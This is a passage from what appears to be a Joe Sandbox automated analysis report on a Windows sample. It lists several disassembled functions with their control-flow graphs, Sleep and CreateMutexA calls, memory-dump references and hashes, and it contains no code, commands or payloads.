                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFF1F27090024C9FEB24DF54CC85BDEBBB9EF45304F5042A9F908A7282DB759A88CF91
                                                                                                                                                                                                                                                                            Function 00059BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 219 59ba5-59d91 call 67a00 call 55c10 call 58b30 call 68220
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: a4c924e8a63c875555ec54a18c72d23f89e17ea743c74da12b142d2ed212d6ea
                                                                                                                                                                                                                                                                            • Instruction ID: 5b48257dd89c496870a6c01c94d25c2074197cc6edace2041879a46e414554cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4c924e8a63c875555ec54a18c72d23f89e17ea743c74da12b142d2ed212d6ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48313971B04204CBFB18DB78ED897AEBBA2EB82315F248319E814973D6C77599888751
                                                                                                                                                                                                                                                                            Function 00059F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 241 59f44-59f64 245 59f66-59f72 241->245 246 59f92-59fae 241->246 247 59f74-59f82 245->247 248 59f88-59f8f call 6d663 245->248 249 59fb0-59fbc 246->249 250 59fdc-59ffb 246->250 247->248 253 5a92b 247->253 248->246 255 59fd2-59fd9 call 6d663 249->255 256 59fbe-59fcc 249->256 251 59ffd-5a009 250->251 252 5a029-5a916 call 680c0 250->252 257 5a01f-5a026 call 6d663 251->257 258 5a00b-5a019 251->258 260 5a953-5a994 Sleep CreateMutexA 253->260 261 5a92b call 86c6a 253->261 255->250 256->253 256->255 257->252 258->253 258->257 271 5a9a7-5a9a8 260->271 272 5a996-5a998 260->272 261->260 272->271 273 5a99a-5a9a5 272->273 273->271
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: bcf2328531658b40e7236171efad6c9d3f06805cd23be285962349bc44c7a496
                                                                                                                                                                                                                                                                            • Instruction ID: 0f1791ee207bf24676e18cf06823a0f1c2e2a8974184e6677a1652d7771a9064
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcf2328531658b40e7236171efad6c9d3f06805cd23be285962349bc44c7a496
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6315931704204DBFB18DB78ED897AEB7A2EF86311F248719E814DB2D1C73599888752
                                                                                                                                                                                                                                                                            Function 0005A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 275 5a079-5a099 279 5a0c7-5a0e3 275->279 280 5a09b-5a0a7 275->280 283 5a0e5-5a0f1 279->283 284 5a111-5a130 279->284 281 5a0bd-5a0c4 call 6d663 280->281 282 5a0a9-5a0b7 280->282 281->279 282->281 285 5a930 282->285 287 5a107-5a10e call 6d663 283->287 288 5a0f3-5a101 283->288 289 5a132-5a13e 284->289 290 5a15e-5a916 call 680c0 284->290 293 5a953-5a994 Sleep CreateMutexA 285->293 294 5a930 call 86c6a 285->294 287->284 288->285 288->287 296 5a154-5a15b call 6d663 289->296 297 5a140-5a14e 289->297 305 5a9a7-5a9a8 293->305 306 5a996-5a998 293->306 294->293 296->290 297->285 297->296 306->305 307 5a99a-5a9a5 306->307 307->305
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: e1c6fc6e40a05d3c5263e5d67b3d42e961a6aaf0b6327a68589ee20b3dadbe1a
                                                                                                                                                                                                                                                                            • Instruction ID: b580473cb1434202397b35487ac4aaa4d72fe9ff716e03c8a641b2a213db31c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1c6fc6e40a05d3c5263e5d67b3d42e961a6aaf0b6327a68589ee20b3dadbe1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58317D31B141049BFF18DB78DD897AEB763DB83315F208719E814973D1C73599888716
                                                                                                                                                                                                                                                                            Function 0005A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 309 5a1ae-5a1ce 313 5a1d0-5a1dc 309->313 314 5a1fc-5a218 309->314 315 5a1f2-5a1f9 call 6d663 313->315 316 5a1de-5a1ec 313->316 317 5a246-5a265 314->317 318 5a21a-5a226 314->318 315->314 316->315 321 5a935 316->321 319 5a267-5a273 317->319 320 5a293-5a916 call 680c0 317->320 323 5a23c-5a243 call 6d663 318->323 324 5a228-5a236 318->324 326 5a275-5a283 319->326 327 5a289-5a290 call 6d663 319->327 330 5a953-5a994 Sleep CreateMutexA 321->330 331 5a935 call 86c6a 321->331 323->317 324->321 324->323 326->321 326->327 327->320 339 5a9a7-5a9a8 330->339 340 5a996-5a998 330->340 331->330 340->339 341 5a99a-5a9a5 340->341 341->339
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
